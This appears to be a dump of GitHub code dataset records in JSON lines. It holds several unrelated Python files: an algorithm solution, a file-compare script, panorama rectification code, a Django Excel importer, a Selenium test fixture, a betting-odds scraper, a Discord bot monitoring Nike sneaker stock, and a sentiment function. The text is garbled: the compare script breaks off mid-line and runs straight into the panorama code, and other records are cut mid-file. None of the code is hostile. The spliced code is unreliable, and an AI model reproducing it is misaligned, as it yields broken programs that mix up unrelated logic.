print(cnt[3])\n","repo_name":"s2lee/PS","sub_path":"BOJ/Prefix Sum/21757.py","file_name":"21757.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16035496673","text":"import sys\n\ndef main():\n\n # initial filenames\n script_name = ''\n input_one = ''\n input_two = ''\n name = ''\n\n # get args\n if len(sys.argv) == 3:\n print('number of arguments: ', len(sys.argv))\n script_name = sys.argv[0]\n input_one = sys.argv[1]\n input_two = sys.argv[2]\n else:\n print('ERROR: WRONG ARGUMENTS')\n sys.exit(0)\n\n compare(input_one, input_two)\n\ndef compare(input_one, input_two):\n\n print('-- compare called --')\n\n input_one_count = 0\n input_two_count = 0\n\n with open(input_one) as f:\n for line in f:\n #print (line)\n\n if '= 0:\n im_manhattan = im\n # if plots.hl:\n # im_manhattan = im_hl.copy()\n # else:\n # im_manhattan = im.copy()\n draw = ImageDraw.Draw(im_manhattan)\n u0 = width / 2\n v0 = height / 2\n if z[1] > v0:\n posy = 0\n else:\n posy = height\n\n if 
confident == 3:\n pt1 = (u0, posy)\n pt2 = (manh_vps[0, 0], manh_vps[0, 1])\n draw.line((pt1, pt2), fill=tuple([255, 0, 0]), width=4)\n pt2 = (manh_vps[1, 0], manh_vps[1, 1])\n draw.line((pt1, pt2), fill=tuple([0, 255, 0]), width=4)\n pt2 = (manh_vps[2, 0], manh_vps[2, 1])\n draw.line((pt1, pt2), fill=tuple([0, 0, 255]), width=4)\n elif confident == 2:\n pt1 = (u0, posy)\n pt2 = (manh_vps[0, 0], manh_vps[0, 1])\n draw.line((pt1, pt2), fill=tuple([255, 0, 0]), width=1)\n pt2 = (manh_vps[1, 0], manh_vps[1, 1])\n draw.line((pt1, pt2), fill=tuple([0, 255, 0]), width=4)\n pt2 = (manh_vps[2, 0], manh_vps[2, 1])\n draw.line((pt1, pt2), fill=tuple([0, 0, 255]), width=4)\n elif confident == 1:\n pt1 = (u0, posy)\n pt2 = (manh_vps[0, 0], manh_vps[0, 1])\n draw.line((pt1, pt2), fill=tuple([255, 0, 0]), width=1)\n pt2 = (manh_vps[1, 0], manh_vps[1, 1])\n draw.line((pt1, pt2), fill=tuple([0, 255, 0]), width=1)\n pt2 = (manh_vps[2, 0], manh_vps[2, 1])\n draw.line((pt1, pt2), fill=tuple([0, 0, 255]), width=4)\n\n im_manhattan.save('tmp/im_manhattan.jpg')\n\n # save the results image\n\n if plots.hvps and todo.save_results_image:\n img_path = imageList[i]\n [pathstr, img_name] = os.path.split(img_path)\n name = os.path.splitext(img_name)[0]\n name = './intermediate/' + name + 'res.png'\n im.save(name)\n\n # ortho-rectify all vertical planes\n\n if todo.ortho_rectify:\n K = np.array([])\n if focal > 0:\n K = np.array([[focal, 0.0, width / 2], [0.0, focal, height / 2], [0.0, 0.0, 1.0]])\n hl_homo = line_hmg_from_two_points(np.array([hl[0, 0], hl[0, 1]]), np.array([hl[1, 0], hl[1, 1]]))\n\n\n [imR, maskR, transform, crop_imR] = orthorectify_from_vps_and_lines(im_array, im_useless, hvps, hvp_groups, z, z_group, ls, 4, K, hl_homo, 0)\n\n # imR = orthorectify_from_vps_and_lines(im_array, im_useless, hvps, hvp_groups, z, z_group, ls, 4, K, hl_homo, 0)\n\n\n # if len(imR) > 0:\n # if len(imR[0]) != 0:\n # zhupei_save[i].append(transform[0][\"H\"].tolist())\n # if len(imR) > 1:\n # if len(imR[1]) != 0:\n # zhupei_save[i].append(transform[1][\"H\"].tolist())\n # if len(imR) > 2:\n # if len(imR[2]) != 0:\n # zhupei_save[i].append(transform[2][\"H\"].tolist())\n\n\n if todo.save_ortho_images:\n img_path = imageList[i]\n [pathstr, img_name] = os.path.split(img_path)\n name = os.path.splitext(img_name)[0]\n black_percentage = []\n index_list = []\n\n for j in range(len(imR)):\n if len(imR[j]) != 0:\n\n if not os.path.exists('./output/'):\n os.makedirs('./output/')\n out_img_name = './output/' + name + '_R_' + str(j) + '.jpg'\n skimage.io.imsave(out_img_name, maskR[j])\n\n\n\n # for j in range(len(imR)):\n # if len(imR[j]) != 0:\n # black_percentage.append(1 - maskR[j].mean())\n # index_list.append(j)\n # if len(index_list) > 0:\n # output_num = 0\n # if np.array(black_percentage).min() < 0.5 * black_percentage[0] and black_percentage[0] > 0.15:\n # output_num = index_list[np.argmin(black_percentage)]\n # out_img_name = './output/manual_selection' + name + '_R_' + str(output_num) + '.jpg'\n # skimage.io.imsave(out_img_name, imR[output_num])\n # # break\n # # mask_img_name = './mask/' + name + '_R_' + str(output_num) + '.jpg'\n # # skimage.io.imsave(mask_img_name, maskR[output_num])\n # # crop_img_name = './crop_output/' + name + '_R_' + str(output_num) + '.jpg'\n # # skimage.io.imsave(crop_img_name, crop_imR[output_num])\n #\n #\n # out_img_name = './output/' + name + '_R_' + str(0) + '.jpg'\n # skimage.io.imsave(out_img_name, imR[0])\n # # break\n # # mask_img_name = './mask/' + name + '_R_' + str(0) + '.jpg'\n # # 
skimage.io.imsave(mask_img_name, maskR[0])\n # # crop_img_name = './crop_output/' + name + '_R_' + str(0) + '.jpg'\n # # skimage.io.imsave(crop_img_name, crop_imR[0])\n\n\n\n\n\n\n # with open('simon_zenith.json', 'w') as f:\n # json.dump(zhupei_save, f)\n\n\n\n#print(todo.save_results_image)","repo_name":"ZPdesu/lsaa-dataset","sub_path":"Panorama_Rectification/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"35234007672","text":"from datetime import date\nimport pandas as pd\nimport os\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'vlaio_prototype.settings'\nimport django\n# before importing any model\ndjango.setup()\n\nfrom main.models import Company, Interaction, Partner\n\nfrom .vat_normilze import normalize, is_vat\nfrom . import checkers\n\n\nclass Config:\n def __init__(self, xl_to_sql, model_class, xl_types=None, map_df_func=None, checkers=None):\n self.xl_to_sql = xl_to_sql\n self.xl_types = xl_types\n self.xl_cols = set(xl_to_sql.keys())\n self.model_class = model_class\n self.map_df_func=map_df_func\n self.checkers = checkers or []\n\n def insert_models(self, df):\n if self.map_df_func is not None:\n df = self.map_df_func(df)\n dicts = df.to_dict('records')\n self.model_class.objects.bulk_create(\n [\n self.model_class(**{self.xl_to_sql[k]: d[k] for k in self.xl_cols})\n for d in dicts\n ]\n )\n \n def check(self, df):\n \"\"\"\n return a tuple of (errors, warnings)\n \"\"\"\n res = filter(lambda x: x, [f(df) for f in self.checkers])\n warnings = []\n errors = []\n for txt, is_warning in res:\n if is_warning:\n warnings.append(txt)\n else:\n errors.append(txt)\n return errors, warnings\n\n def insert_from_excel(self, file_path):\n df = self.get_data_from_excel_file(file_path)\n self.insert_models(df)\n\n def get_data_from_excel_file(self, file_path):\n df = pd.read_excel(\n file_path,\n encoding='sys.getfilesystemencoding()',\n dtype=self.xl_types\n )\n present = set(df.columns)\n missing = self.xl_cols - present\n if missing:\n raise ValueError(\"Missing columns: \" + \",\".join(missing))\n additional = present - self.xl_cols\n for col in additional:\n del df[col]\n\n return df\n\n\n\n\ndef map_company_vat(df):\n df[\"VAT\"] = df[\"VAT\"].apply(normalize)\n return df\n\n\nCOMPANY_CONFIG = Config(\n xl_to_sql={\n # In file name: db column name\n \"Naam\": \"name\",\n \"VAT\": \"vat\",\n \"werknemers\": \"employees\",\n \"winst\": \"profit\"\n },\n xl_types={\n \"Naam\": str,\n \"VAT\": str,\n \"werknemers\": int,\n \"winst\": int\n },\n model_class=Company,\n map_df_func=map_company_vat,\n checkers=[checkers.check_tva, checkers.check_empty_col(\"Naam\")]\n)\n\n\ndef map_df_interactions(df: pd.DataFrame):\n sources = {\n name: Partner.objects.get_or_create(name=name)[0]\n for name in set(df['Source'])\n }\n df[\"Source\"] = df[\"Source\"].apply(lambda x: sources[x].id)\n # TODO change the date\n df['date'] = date.today()\n df[\"VAT\"] = df[\"VAT\"].apply(normalize)\n return df\n\n\n\nINTERACTION_CONFIG = Config(\n xl_to_sql={\n \"VAT\": \"company_id\",\n \"Source\": 'partner_id',\n \"Type\": \"type\",\n \"Date\": \"date\"\n },\n xl_types={\n \"Source\": str,\n \"Type\": str,\n \"VAT\": str,\n \"date\": date\n },\n model_class=Interaction,\n map_df_func=map_df_interactions,\n checkers=[\n checkers.check_new_parnter,\n checkers.check_new_types,\n checkers.check_empty_col(\"Source\"),\n checkers.check_new_vat,\n checkers.check_tva\n 
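# each checker returns None or a (message, is_warning) tuple; Config.check() splits these into errors and warnings\n    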
]\n)\n","repo_name":"oSoc18/vlaio-network-backend","sub_path":"excel_parse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"28901952193","text":"import os.path\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service as ChromeService\nfrom selenium.webdriver.edge.service import Service as EdgeService\nfrom selenium.webdriver.ie.service import Service as IeService\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nfrom webdriver_manager.microsoft import IEDriverManager\ndriver = None\n\n\n@pytest.fixture(autouse=True)\ndef setup(request, browser):\n    global driver\n    if browser.lower() == \"chrome\":\n        driver = webdriver.Chrome(service=ChromeService(ChromeDriverManager().install()))\n    elif browser.lower() == \"ie\":\n        driver = webdriver.Ie(service=IeService(IEDriverManager().install()))\n    elif browser.lower() == \"edge\":\n        driver = webdriver.Edge(service=EdgeService(EdgeChromiumDriverManager().install()))\n    else:\n        raise ValueError(\"Please pass a correct browser name: Chrome, ie or Edge\")\n    driver.maximize_window()\n    driver.get(\"https://www.yatra.com/\")\n    request.cls.driver = driver\n    yield\n    driver.close()\n\n\ndef pytest_addoption(parser):\n    parser.addoption(\"--browser\", action=\"store\", default=\"Chrome\")\n\n\n@pytest.fixture(scope=\"class\", autouse=True)\ndef browser(request):\n    return request.config.getoption(\"--browser\")\n\n\n@pytest.hookimpl(hookwrapper=True)\ndef pytest_runtest_makereport(item):\n    pytest_html = item.config.pluginmanager.getplugin(\"html\")\n    outcome = yield\n    report = outcome.get_result()\n    extra = getattr(report, \"extra\", [])\n    if report.when == \"call\":\n        # always add url to report\n        extra.append(pytest_html.extras.url(\"https://www.yatra.com/\"))\n        xfail = hasattr(report, \"wasxfail\")\n        if (report.skipped and xfail) or (report.failed and not xfail):\n            # only add additional html on failure\n            report_directory = os.path.dirname(item.config.option.htmlpath)\n            file_name = report.nodeid.replace(\"::\", \"_\") + \".png\"\n            destinationFile = os.path.join(report_directory, file_name)\n            driver.save_screenshot(destinationFile)\n            if file_name:\n                html = '<div><img src=\"%s\" alt=\"screenshot\" style=\"width:304px;height:228px;\" onclick=\"window.open(this.src)\" align=\"right\"/></div>' % file_name\n                extra.append(pytest_html.extras.html(html))\n        report.extra = extra\n\n\ndef pytest_html_report_title(report):\n    report.title = \"Yatra Report\"","repo_name":"Ashish1225/selenium-python-automation-demo","sub_path":"testcases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
markets[m2['Название']][m2[m['T']]] = m['C']\n if 'MIO' in i:\n stage = i['MIO'].get('TSt')\n else:\n stage = None\n if Event.objects.filter(sport=sport, country=country, league=league, home=home, away=away, start__date=start.date()).exists():\n event = Event.objects.get(sport=sport, country=country, league=league, home=home, away=away, start__date=start.date())\n event.start = start\n event.status = status\n event.markets = markets\n event.save()\n else:\n Event.objects.create(\n xbet_id=i['I'],\n sport=sport,\n country=country,\n league=league,\n stage=stage,\n home=home,\n away=away,\n home_logo=home_logo,\n away_logo=away_logo,\n status=status,\n start=start,\n markets=markets,\n include=include,\n )\n time.sleep(30)\n\n\nif __name__ == '__main__':\n while True:\n try:\n scan_xbet()\n except requests.exceptions.ConnectionError:\n continue\n","repo_name":"mamberger/varline","sub_path":"spider_prematch.py","file_name":"spider_prematch.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19184133512","text":"# 직사각형 길이 찾기\n# import sys\n# sys.stdin = open('input.txt','r')\n\nT = int(input())\nfor t in range(1,T+1):\n d = dict()\n num1 = list(map(int,input().split()))\n for i in num1:\n if i not in d:\n d[i] = 1\n else:\n d[i] = d[i] + 1\n\n for key,value in d.items():\n if value == 3:\n break\n elif value == 1:\n break\n print(f'#{t} {(key)}')","repo_name":"Kurman11/TIL","sub_path":"Algorithm/Algorithm_test_02/문제2.py","file_name":"문제2.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38768961052","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Center, CenterReview\nfrom .filters import CenterFilter\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom users.models import Cart\nfrom .forms import CenterReviewForm\nfrom django.core.paginator import Paginator\n\n# Create your views here.\ndef intro(request):\n return render(request, 'center_intro.html', {})\n\ndef detail(request, id):\n center = get_object_or_404(Center, id=id)\n review = center.center_review.all()\n paginator = Paginator(review, 4)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n try:\n if request.user.is_authenticated:\n cart = Cart.objects.get(user=request.user)\n return render(request, 'center_detail.html', {'center':center, 'cart':cart, 'page_obj':page_obj})\n else:\n return render(request, 'center_detail.html', {'center':center, 'page_obj':page_obj})\n except Exception as e:\n return render(request, 'center_detail.html', {'center':center, 'page_obj':page_obj})\n\ndef filter(request):\n center_list = Center.objects.all()\n center_filter = CenterFilter(request.GET, queryset=center_list)\n try:\n if request.user.is_authenticated:\n cart = Cart.objects.get(user=request.user)\n return render(request, 'center_filter.html', {'filter':center_filter, 'cart':cart})\n else:\n return render(request, 'center_filter.html', {'filter':center_filter})\n except Exception as e:\n return render(request, 'center_filter.html', {'filter':center_filter})\n\ndef view_on_map(request):\n qs = Center.objects.all()\n q = request.GET.get('q', '')\n if q:\n qs = qs.filter(Q(address__icontains=q)|Q(name__icontains=q))\n\n return render(request, 'view_on_map.html', {'center_list':qs, 'q':q})\n\ndef add_review_to_center(request, id):\n if 
request.user.is_authenticated:\n        center = get_object_or_404(Center, id=id)\n        if request.method == \"POST\":\n            form = CenterReviewForm(request.POST)\n            if form.is_valid():\n                review = form.save(commit=False)\n                review.center = center\n                review.author = request.user.username\n                review.save()\n                return redirect('center_detail', id=center.id)\n            else:\n                form = CenterReviewForm()\n                messages.warning(request, \"유효하지 않은 형식입니다. 다시 입력해주세요.\")\n                return render(request, 'add_review_to_center.html', {'form':form})\n        else:\n            form = CenterReviewForm()\n            return render(request, 'add_review_to_center.html', {'form':form})\n    else:\n        form = CenterReviewForm()\n        messages.warning(request, \"로그인 후 이용하실 수 있습니다.\")\n        return render(request, 'add_review_to_center.html', {'form':form})\n","repo_name":"jjisol/preranaV1","sub_path":"center/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5636588827","text":"import logging\nimport multiprocessing\nimport random\nimport time\nimport discord\nfrom discord.ext import commands, tasks\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom multiprocessing import Process\n\nimport bot_secrets\n\ndunks_ayer = []\ndunks_nuevas = []\n\n\nnike_page='https://www.nike.com/es/w?q=dunk&vst=dunk'\noptions = webdriver.ChromeOptions()\noptions.binary_location = \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\ntoken = bot_secrets.bot_token\nbot = discord.Client()\n\n\n\n@tasks.loop(seconds=10)\nasync def lista_dunks():\n    global dunks_ayer\n    try:\n        driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n        driver.get(nike_page)\n        # Accept cookies\n        WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"gen-nav-commerce-header-v2\"]/div[1]/div/div[2]/div/div[2]/div[2]/button'))).click()\n\n        scroll_bottom(driver)\n        dunks = driver.find_elements(By.CLASS_NAME, 'product-card__img-link-overlay')\n        dunks_hoy = [dunk.get_attribute('href') for dunk in dunks if 'high' not in dunk.get_attribute('href')]\n        dunks_nuevas = list(filter(lambda dunk: dunk not in dunks_ayer, dunks_hoy))\n        dunks_ayer = dunks_hoy\n        print(dunks_nuevas)\n        channel = bot.get_channel(1002216168163115172)\n        for link in dunks_nuevas:\n            await channel.send(link)\n        for link in dunks_hoy: # TODO: create a pool of processes so each process checks the stock of as many pairs as it can\n            await comprueba_stock(driver,channel,link)\n    except Exception as e:\n        logging.warning(f\"Exception: {e}\")\n\n\nasync def comprueba_stock(driver, channel, link):\n    #driver.get(link)\n    driver.get(\"https://www.nike.com/es/launch/t/dunk-low-golden-moss\")\n    tallas = driver.find_elements(By.NAME, \"skuAndSize\")\n    disponibles = []\n    if tallas: # Two listing types: by name skuAndSize and by property size-available\n        for talla in tallas:\n            if not talla.get_attribute(\"disabled\"):\n                atributo = talla.get_attribute(\"id\")\n                disponibles.append(driver.find_element(By.XPATH,f\"//*[@for='{atributo}']\").text)\n\n    else:\n        tallas = driver.find_elements(By.XPATH, \"//*[@data-qa='size-available']\")\n        for talla in tallas:\n            disponibles.append(talla.text)\n\n    if disponibles:\n        await channel.send(link + \"\\n\" + \"\\n\".join(disponibles))\n    else:\n        await channel.send(link + 
\"\\nSin stock\")\n\n\n\nasync def work(item, count):\n name = multiprocessing.current_process().name\n logging.info(f'{name} started: {item}')\n for x in range(count):\n logging.info(f'{name}: {item} = {x}')\n time.sleep(1)\n logging.info(f'{name} finished')\n return item + ' is finished'\n\nasync def proc_result(result):\n logging.info(f'result = {result}')\n\n\n@bot.event\nasync def on_ready():\n lista_dunks.start()\n\n\ndef scroll_bottom(driver):\n SCROLL_PAUSE_TIME = 0.5\n\n # Get scroll height\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n\nbot.run(token)\nlista_dunks.start()","repo_name":"sworfisc/sneaker_monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41798861386","text":"import copy\nimport dataclasses\nimport enum\nimport logging\nimport pickle\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, Any, List, Optional, Tuple, Type\n\nimport numpy as np\n\nfrom srl.base.define import EnvObservationTypes, RLObservationType, RLTypes\nfrom srl.base.env.env_run import EnvRun, SpaceBase\nfrom srl.base.rl.processor import Processor\nfrom srl.base.spaces.box import BoxSpace\n\nif TYPE_CHECKING:\n from srl.base.rl.algorithms.extend_worker import ExtendWorker\n\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass RLConfig(ABC):\n processors: List[Processor] = field(default_factory=list)\n override_env_observation_type: EnvObservationTypes = EnvObservationTypes.UNKNOWN\n override_action_type: RLTypes = RLTypes.ANY # RL側がANYの場合のみ有効\n\n action_division_num: int = 5\n \"\"\"\n The number of divisions when converting from continuous to discrete values.\n If -1, round by round transform.\n \"\"\"\n # 連続値から離散値に変換する場合の分割数です。-1の場合round変換で丸めます。\n\n observation_division_num: int = -1\n \"\"\"\n The number of divisions when converting from continuous to discrete values.\n If -1, round by round transform.\n \"\"\"\n # 連続値から離散値に変換する場合の分割数です。-1の場合round変換で丸めます。\n\n extend_worker: Optional[Type[\"ExtendWorker\"]] = None\n parameter_path: str = \"\"\n remote_memory_path: str = \"\"\n use_rl_processor: bool = True # RL側のprocessorを使用するか\n\n use_render_image_for_observation: bool = False\n \"\"\" Change state input to render_image. Existing settings will be overwritten. 
\"\"\"\n # 状態の入力をrender_imageに変更。既存の設定は上書きされます。\n\n # --- Worker Config\n enable_state_encode: bool = True\n enable_action_decode: bool = True\n enable_reward_encode: bool = True\n window_length: int = 1\n dummy_state_val: float = 0.0\n\n # --- other\n enable_sanitize_value: bool = True\n enable_assertion_value: bool = False\n\n def __post_init__(self) -> None:\n self._is_reset = False\n self._run_processors: List[Processor] = []\n self._rl_action_type = self.override_action_type\n\n # The device used by the framework.\n self._used_device_tf: str = \"/CPU\"\n self._used_device_torch: str = \"cpu\"\n\n self._check_parameter = True\n\n def assert_params(self) -> None:\n assert self.window_length > 0\n\n def to_json_dict(self) -> dict:\n d = {}\n for k, v in self.__dict__.items():\n if k.startswith(\"_\"):\n continue\n if v is None or type(v) in [int, float, bool, str]:\n d[k] = v\n elif type(v) in [list, dict, tuple]:\n d[k] = copy.deepcopy(v)\n elif isinstance(v, bytes):\n d[k] = str(v)\n elif issubclass(type(v), enum.Enum):\n d[k] = v.name\n elif dataclasses.is_dataclass(v):\n d[k] = dataclasses.asdict(v)\n else:\n d[k] = str(v)\n return d\n\n # ----------------------------\n # RL config\n # ----------------------------\n @abstractmethod\n def getName(self) -> str:\n raise NotImplementedError()\n\n @property\n @abstractmethod\n def base_action_type(self) -> RLTypes:\n raise NotImplementedError()\n\n @property\n @abstractmethod\n def base_observation_type(self) -> RLTypes:\n raise NotImplementedError()\n\n @abstractmethod\n def get_use_framework(self) -> str:\n raise NotImplementedError()\n\n def set_config_by_env(self, env: EnvRun) -> None:\n pass # NotImplemented\n\n def set_config_by_actor(self, actor_num: int, actor_id: int) -> None:\n pass # NotImplemented\n\n def set_processor(self) -> List[Processor]:\n return [] # NotImplemented\n\n @property\n def info_types(self) -> dict:\n \"\"\"infoの情報のタイプを指定、出力形式等で使用を想定\n 各行の句は省略可能\n name : {\n \"type\": 型を指定(None, int, float, str)\n \"data\": 以下のデータ形式を指定\n \"ave\" : 平均値を使用(default)\n \"last\": 最後のデータを使用\n \"min\" : 最小値\n \"max\" : 最大値\n }\n \"\"\"\n return {} # NotImplemented\n\n # ----------------------------\n # reset config\n # ----------------------------\n def reset(self, env: EnvRun, is_logger: bool = True) -> None:\n if self._is_reset:\n return\n self._check_parameter = False\n\n if is_logger:\n logger.info(f\"--- {self.getName()}\")\n logger.info(f\"max_episode_steps : {env.max_episode_steps}\")\n logger.info(f\"player_num : {env.player_num}\")\n logger.info(f\"observation_type(env) : {env.observation_type}\")\n logger.info(f\"observation_space(env): {env.observation_space}\")\n\n # env property\n self.env_max_episode_steps = env.max_episode_steps\n self.env_player_num = env.player_num\n\n self._env_action_space = env.action_space # action_spaceはenvを使いまわす\n rl_observation_space = env.observation_space\n rl_env_observation_type = env.observation_type\n\n # -----------------------\n # observation\n # -----------------------\n\n # --- observation_typeの上書き\n if self.override_env_observation_type != EnvObservationTypes.UNKNOWN:\n rl_env_observation_type = self.override_env_observation_type\n if is_logger:\n logger.info(f\"override observation type: {rl_env_observation_type}\")\n\n self._run_processors = []\n if self.enable_state_encode:\n # --- add processor\n if self.use_render_image_for_observation:\n from srl.rl.processors.render_image_processor import RenderImageProcessor\n\n self._run_processors.append(RenderImageProcessor())\n 
self._run_processors.extend(self.processors)\n if self.use_rl_processor:\n self._run_processors.extend(self.set_processor())\n\n # --- processor\n for processor in self._run_processors:\n rl_observation_space, rl_env_observation_type = processor.preprocess_observation_space(\n rl_observation_space,\n rl_env_observation_type,\n env,\n self,\n )\n if is_logger:\n logger.info(f\"processor obs space: {rl_observation_space}\")\n logger.info(f\"processor obs type : {rl_env_observation_type}\")\n\n # --- window_length\n self._one_observation = rl_observation_space\n if self.window_length > 1:\n rl_observation_space = BoxSpace(\n (self.window_length,) + self._one_observation.shape,\n np.min(self._one_observation.low),\n np.max(self._one_observation.high),\n )\n if is_logger:\n logger.info(f\"window_length obs space: {rl_observation_space}\")\n\n self._rl_observation_space = rl_observation_space\n self._rl_env_observation_type = rl_env_observation_type\n\n # --- obs type\n # 優先度\n # 1. RL\n # 2. obs_space\n rl_obs_type = self.base_observation_type\n if rl_obs_type == RLTypes.ANY:\n rl_obs_type = self._rl_observation_space.rl_type\n self._rl_observation_type = rl_obs_type\n\n # check type\n _f = False\n if rl_obs_type == RLTypes.DISCRETE:\n if rl_env_observation_type not in [\n EnvObservationTypes.DISCRETE,\n EnvObservationTypes.SHAPE3,\n EnvObservationTypes.SHAPE2,\n ]:\n _f = True\n if _f:\n if is_logger:\n logger.warning(f\"EnvType and RLType do not match. {rl_env_observation_type} != {rl_obs_type}\")\n\n # -----------------------\n # action type\n # -----------------------\n # 優先度\n # 1. RL\n # 2. override_action_type\n # 3. action_space\n rl_action_type = self.base_action_type\n if rl_action_type == RLTypes.ANY:\n rl_action_type = self.override_action_type\n if rl_action_type == RLTypes.ANY:\n rl_action_type = self._env_action_space.rl_type\n self._rl_action_type = rl_action_type\n\n # --- base obs type\n base_obs_type = self.base_observation_type\n if base_obs_type == RLTypes.ANY:\n base_obs_type = self._rl_observation_space.rl_type\n\n # --- division\n # RLが DISCRETE で Space が CONTINUOUS なら分割して DISCRETE にする\n if (self._rl_action_type == RLTypes.DISCRETE) and (self._env_action_space.rl_type == RLTypes.CONTINUOUS):\n self._env_action_space.create_division_tbl(self.action_division_num)\n if (base_obs_type == RLTypes.DISCRETE) and (self._rl_observation_space.rl_type == RLTypes.CONTINUOUS):\n self._rl_observation_space.create_division_tbl(self.observation_division_num)\n\n # --- set rl property\n if self._rl_action_type == RLTypes.DISCRETE:\n self._action_num = self.action_space.n\n self._action_low = np.ndarray(0)\n self._action_high = np.ndarray(self._action_num - 1)\n else:\n # ANYの場合もCONTINUOUS\n self._action_num = self.action_space.list_size\n self._action_low = np.array(self.action_space.list_low)\n self._action_high = np.array(self.action_space.list_high)\n\n # --- option\n self.set_config_by_env(env)\n\n self._is_reset = True\n if is_logger:\n logger.info(f\"action_space(env) : {self._env_action_space}\")\n logger.info(f\"action_type(rl) : {self._rl_action_type}\")\n logger.info(f\"observation_env_type(rl): {self._rl_env_observation_type}\")\n logger.info(f\"observation_type(rl) : {self._rl_observation_type}\")\n logger.info(f\"observation_space(rl) : {self._rl_observation_space}\")\n\n def __setattr__(self, name, value):\n if name == \"_is_reset\":\n object.__setattr__(self, name, value)\n return\n\n if hasattr(self, \"_check_parameter\"):\n if self._check_parameter and not hasattr(self, 
name):\n logger.warning(f\"An undefined variable was assigned. {name}={value}\")\n\n # configが書き変わったら reset が必要\n if name in [\n \"processors\",\n \"override_env_observation_type\",\n \"override_action_type\",\n \"action_division_num\",\n \"use_render_image_for_observation\",\n \"use_rl_processor\",\n \"enable_state_encode\",\n \"enable_action_decode\",\n \"window_length\",\n ]:\n self._is_reset = False\n object.__setattr__(self, name, value)\n\n # ----------------------------\n # utils\n # ----------------------------\n @property\n def name(self) -> str:\n return self.getName()\n\n @property\n def is_reset(self) -> bool:\n return self._is_reset\n\n @property\n def run_processors(self) -> List[Processor]:\n return self._run_processors\n\n @property\n def used_device_tf(self) -> str:\n return self._used_device_tf\n\n @property\n def used_device_torch(self) -> str:\n return self._used_device_torch\n\n @property\n def action_space(self) -> SpaceBase:\n return self._env_action_space\n\n @property\n def action_type(self) -> RLTypes:\n return self._rl_action_type\n\n @property\n def observation_space(self) -> SpaceBase:\n return self._rl_observation_space\n\n @property\n def observation_shape(self) -> Tuple[int, ...]:\n return self._rl_observation_space.shape\n\n @property\n def observation_type(self) -> RLTypes:\n return self._rl_observation_type\n\n @property\n def env_observation_type(self) -> EnvObservationTypes:\n return self._rl_env_observation_type\n\n def copy(self, reset_env_config: bool = False) -> Any:\n config = self.__class__()\n config._check_parameter = False\n\n for k, v in self.__dict__.items():\n if isinstance(v, EnvRun):\n continue\n try:\n setattr(config, k, pickle.loads(pickle.dumps(v)))\n except TypeError as e:\n logger.warning(f\"'{k}' copy fail.({e})\")\n\n if reset_env_config:\n config._is_reset = False\n else:\n config._is_reset = self._is_reset\n return config\n\n def create_dummy_state(self, is_one: bool = False) -> RLObservationType:\n if is_one:\n return np.full(self._one_observation.shape, self.dummy_state_val, dtype=np.float32)\n else:\n return np.full(self.observation_shape, self.dummy_state_val, dtype=np.float32)\n\n # ----------------------------------\n # rl use property(reset後に使えます)\n # ----------------------------------\n @property\n def action_num(self) -> int:\n return self._action_num\n\n @property\n def action_low(self) -> np.ndarray:\n return self._action_low\n\n @property\n def action_high(self) -> np.ndarray:\n return self._action_high\n\n\n@dataclass\nclass DummyConfig(RLConfig):\n name: str = \"dummy\"\n\n @property\n def base_action_type(self) -> RLTypes:\n return RLTypes.ANY\n\n @property\n def base_observation_type(self) -> RLTypes:\n return RLTypes.ANY\n\n def get_use_framework(self) -> str:\n return \"\"\n\n def getName(self) -> str:\n return self.name\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/base/rl/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13902,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"71886312054","text":"# liu hu lexicon sentiment analysis\n# adapted from http://www.nltk.org/_modules/nltk/sentiment/util.html - demo_liu_hu_lexicon\nfrom nltk.corpus import opinion_lexicon\nfrom nltk.tokenize import treebank\ntokenizer = treebank.TreebankWordTokenizer()\n\ndef sentiment_liu_hu(text):\n pos_words = 0\n neg_words = 